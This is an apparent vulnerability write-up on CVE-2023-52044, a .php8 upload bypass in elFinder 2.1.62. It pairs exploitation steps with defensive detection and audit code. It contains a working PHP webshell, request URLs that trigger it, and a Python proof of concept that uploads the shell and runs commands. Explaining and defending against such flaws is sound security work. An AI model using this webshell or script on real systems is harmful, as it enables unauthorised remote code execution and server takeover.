CVE-2023-52044 - Studio-42 elFinder 2.1.62 `php8` File Upload RCE Explained and Exploited

CVE-2023-52044 is a recently disclosed vulnerability affecting Studio-42 elFinder version 2.1.62. Its consequences are critical: it allows an attacker to upload PHP code with a .php8 extension, which can then be executed remotely, granting the attacker full control. Let's break down how this works, walk through how to exploit it, and provide mitigation tips.

What is Studio-42 elFinder?

elFinder is a popular open-source web-based file manager. It is often embedded in content management systems (CMSes), control panels, and other web apps to provide file browsing and uploads through a user-friendly graphical interface.

How It Happens

When a file upload is processed, elFinder checks the file against an *allow* or *deny* list to block dangerous files (like .php). In version 2.1.62, however, that restriction does not block files with the .php8 extension. On a server whose PHP handler is also mapped to .php8, such a file runs as a PHP script, so uploading a .php8 file is just as dangerous as uploading a .php file.

*This happens because the extension filter didn't anticipate the newer phpN extension variants.*
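As an added illustration (my code, not from the write-up or from the elFinder project), the Python snippet below contrasts an extension-only deny list of the kind described above with a pattern-based rule and an allow-list. It goes slightly beyond the page by inspecting every extension segment of a name (so `shell.php8.jpg` is also caught), which matters on servers that dispatch handlers by any matching suffix. The legacy list and the sample file names are constructed for the demonstration.

```python
import re

# Constructed deny list of the kind that predates ".php8": specific
# extensions spelled out one by one, with no rule for newer phpN variants.
LEGACY_DENY = {"php", "php3", "php4", "php5", "php7", "phtml"}

# Pattern rule: "php" followed by zero or more digits, plus phtml/phar,
# matched case-insensitively so ".PHP8" is treated like ".php8".
SCRIPT_EXT = re.compile(r"^(php\d*|phtml|phar)$", re.IGNORECASE)


def extension(filename: str) -> str:
    """Return the final extension of a file name without the dot ('' if none)."""
    name = filename.rsplit("/", 1)[-1]
    if "." not in name:
        return ""
    return name.rsplit(".", 1)[1]


def segments(filename: str) -> list[str]:
    """All extension segments after the first dot, e.g. 'a.php8.jpg' -> ['php8', 'jpg']."""
    return filename.rsplit("/", 1)[-1].split(".")[1:]


def legacy_filter_blocks(filename: str) -> bool:
    """Pre-fix behaviour: exact match of the last extension against a fixed list."""
    return extension(filename).lower() in LEGACY_DENY


def hardened_filter_blocks(filename: str) -> bool:
    """Pattern-based deny rule applied to every extension segment."""
    return any(SCRIPT_EXT.match(seg) for seg in segments(filename))


def allowlist_permits(filename: str, allowed: set[str]) -> bool:
    """Allow-list approach: the final extension must be explicitly permitted
    and no segment may be a script extension."""
    return extension(filename).lower() in allowed and not hardened_filter_blocks(filename)


# Constructed sample names covering the cases discussed in the write-up.
SAMPLE = ["evil.php8", "evil.PHP8", "report.php", "notes.txt",
          "photo.jpg", "a.php9", "shell.php8.jpg"]


def compare(names=SAMPLE) -> dict[str, tuple[bool, bool]]:
    """Map file name -> (legacy list blocks it?, hardened rule blocks it?)."""
    return {n: (legacy_filter_blocks(n), hardened_filter_blocks(n)) for n in names}


if __name__ == "__main__":
    for name, (legacy, hardened) in compare().items():
        print(f"{name:16} legacy_blocks={legacy!s:5} hardened_blocks={hardened}")
```

Running it shows the gap directly: `report.php` is stopped by both rules, while `evil.php8`, `evil.PHP8` and `shell.php8.jpg` slip past the legacy list and are caught only by the pattern rule. An allow-list of the few types the application actually needs avoids the whole class of "forgot a variant" bugs.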

Prerequisites

- The server runs PHP 8.x and processes .php8 files
- An account or exploit chain that allows file upload (as guest or authenticated user, depending on elFinder config)

1. Create the Payload File

Save the following as evil.php8:

```php
<?php
// Simple webshell
if (isset($_REQUEST['cmd'])) {
    system($_REQUEST['cmd']);
}
?>
```

2. Access elFinder's File Upload

Go to the publicly accessible elFinder upload form and upload evil.php8 as you would any normal file.

3. Locate the Uploaded File

Uploaded files are typically stored in a web-accessible directory, like

http://victim.site/elfinder/files/evil.php8

4. Trigger Remote Code Execution

You (or an attacker) can execute commands by requesting the script via HTTP and passing a command in the URL, like:

http://victim.site/elfinder/files/evil.php8?cmd=whoami

This will execute whoami on the victim server and display the output.

Here's a basic Python PoC script that automates this exploitation:

```python
import requests

# Replace with actual URL path of eLfinder instance
url = 'http://victim.site/elfinder/php/connector.php'
upload_url = 'http://victim.site/elfinder/files/evil.php8'

# Step 1: Upload the payload (varies per eLfinder configuration)
files = {'upload[]': ('evil.php8', "<?php system($_GET['c']); ?>", 'application/x-php')}
r = requests.post(url, files=files)
print("Upload status:", r.status_code)

# Step 2: Execute command
cmd = 'id'
r = requests.get(upload_url, params={'c': cmd})
print("Command output:\n", r.text)
```

> Note: Adjust file paths and POST details for your specific setup.
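For the defensive side of the same exchange, here is an added Python example (my code, not part of the original write-up) that scans web-server access-log lines for requests to script-like files under the upload directory and raises the severity when a command-style query parameter is present. The log lines, the `/elfinder/files/` prefix (taken from the URLs above) and the parameter watch-list are constructed assumptions. One caveat worth building in: elFinder's own connector legitimately uses a `cmd=` parameter, so a bare grep for `cmd=` is noisy; restricting the rule to the upload path keeps the connector traffic out of the alert.

```python
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Standard "combined" access-log layout (ip ident user [time] "request" status size ...).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Assumed upload location, as used in the write-up's URLs.
UPLOAD_PREFIXES = ("/elfinder/files/",)
# Any phpN variant plus phtml/phar at the end of the path.
SCRIPT_EXT = re.compile(r"\.(php\d*|phtml|phar)$", re.IGNORECASE)
# Constructed watch-list of parameter names commonly used to pass a command.
SHELL_PARAMS = {"cmd", "c", "exec", "command"}


def classify(line: str) -> Optional[dict]:
    """Parse one log line and rate it: none / medium / high."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    path = parts.path
    in_upload_dir = path.startswith(UPLOAD_PREFIXES)
    script_like = bool(SCRIPT_EXT.search(path))
    suspicious = set(parse_qs(parts.query)) & SHELL_PARAMS
    severity = "none"
    if in_upload_dir and script_like:
        # A script being served from the upload directory is already a finding;
        # a command-style parameter on top of it is the webshell pattern.
        severity = "high" if suspicious else "medium"
    return {
        "ip": m["ip"],
        "path": path,
        "status": int(m["status"]),
        "severity": severity,
        "params": sorted(suspicious),
    }


# Constructed sample log: a benign image fetch, a legitimate connector call
# (note its own cmd=upload parameter), then the two webshell requests.
SAMPLE_LOG = """\
203.0.113.5 - - [31/Oct/2024:19:20:01 +0000] "GET /elfinder/files/photo.jpg HTTP/1.1" 200 5120
203.0.113.7 - - [31/Oct/2024:19:21:14 +0000] "POST /elfinder/php/connector.php?cmd=upload HTTP/1.1" 200 310
203.0.113.7 - - [31/Oct/2024:19:21:30 +0000] "GET /elfinder/files/evil.php8?cmd=whoami HTTP/1.1" 200 16
203.0.113.7 - - [31/Oct/2024:19:21:45 +0000] "GET /elfinder/files/evil.php8 HTTP/1.1" 200 0
"""


def scan(log_text: str) -> list:
    """Return every parsed line whose severity is above 'none'."""
    return [r for r in map(classify, log_text.splitlines()) if r and r["severity"] != "none"]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"[{hit['severity']:6}] {hit['ip']} {hit['path']} params={hit['params']}")
```

A 200 status on a `.php8` path under the upload directory is itself worth alerting on even without a parameter, because it proves the server is executing (or at least serving) the file; the medium-severity line above captures that case.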

Impact

- Exfiltrate sensitive data

This makes the bug *critical* for any public installations.

References

- GitHub Issue Discussion: Studio-42 elFinder RCE
- Original elFinder Project
- CVE Details for 2023-52044

Mitigation

Restrict File Types in Config:

Manually blacklist php and all variants (php3, php4, php5, php7, php8, etc.) in the uploadDeny option, or, better, deny everything and allow only the types you actually need. These options are matched against the detected MIME type, so 'image' covers every image/* type:

```php
'uploadDeny'  => ['all'],
'uploadAllow' => ['image', 'text/plain', ...],
```

Deny direct web access to the upload directory (Apache .htaccess):

```
Deny from all
```
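To verify the mitigation on an installation that was already exposed, the following added Python audit (my code, not from the page or from elFinder) walks an upload directory, lists every file whose name carries a PHP-interpretable extension in any segment, and checks whether an `.htaccess` there denies direct access, accepting the Apache 2.4 form `Require all denied` as well as the `Deny from all` shown above. The directory tree it inspects is constructed in a temporary folder for the demonstration.

```python
import re
import tempfile
from pathlib import Path

# "php" followed by digits, plus phtml/phar, in any extension segment.
SCRIPT_EXT = re.compile(r"^(php\d*|phtml|phar)$", re.IGNORECASE)


def is_script_file(path: Path) -> bool:
    """True if any extension segment of the file name is a PHP-interpretable extension."""
    return any(SCRIPT_EXT.match(seg) for seg in path.name.split(".")[1:])


def htaccess_denies_access(htaccess: Path) -> bool:
    """Accept 'Deny from all' (Apache 2.2 syntax) or 'Require all denied' (Apache 2.4)."""
    if not htaccess.is_file():
        return False
    text = htaccess.read_text(encoding="utf-8", errors="replace").lower()
    return "deny from all" in text or "require all denied" in text


def audit_upload_dir(root: Path) -> dict:
    """Report script files under root (relative POSIX paths) and the .htaccess status."""
    script_files = [
        p.relative_to(root).as_posix()
        for p in sorted(root.rglob("*"))
        if p.is_file() and is_script_file(p)
    ]
    return {
        "script_files": script_files,
        "htaccess_denies": htaccess_denies_access(root / ".htaccess"),
    }


def build_demo_tree(with_htaccess: bool = True) -> Path:
    """Constructed upload directory: two benign files and two planted script files."""
    root = Path(tempfile.mkdtemp(prefix="elfinder-audit-"))
    (root / "photo.jpg").write_bytes(b"\xff\xd8\xff")  # constructed JPEG header bytes
    (root / "notes.txt").write_text("harmless")
    (root / "evil.php8").write_text("<?php /* planted for the demo */ ?>")
    (root / "sub").mkdir()
    (root / "sub" / "shell.phtml").write_text("<?php /* planted for the demo */ ?>")
    if with_htaccess:
        (root / ".htaccess").write_text("Deny from all\n")
    return root


if __name__ == "__main__":
    result = audit_upload_dir(build_demo_tree())
    for f in result["script_files"]:
        print("script file in upload dir:", f)
    print(".htaccess blocks direct access:", result["htaccess_denies"])
```

Point `audit_upload_dir` at the real upload directory of a deployment; any hit in `script_files` is evidence that the filter was bypassed at some point and should be treated as an incident, not just cleaned up.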

Conclusion

CVE-2023-52044 is a textbook example of why security filters need to keep up with changes in language and file extension handling. If you use elFinder, check your version now, review your allowed extensions, and patch as soon as possible. Remember, attackers are always creative, so don't let your upload filter be your weak link!

Timeline

Published on: 10/31/2024 19:15:12 UTC
Last modified on: 11/01/2024 16:35:05 UTC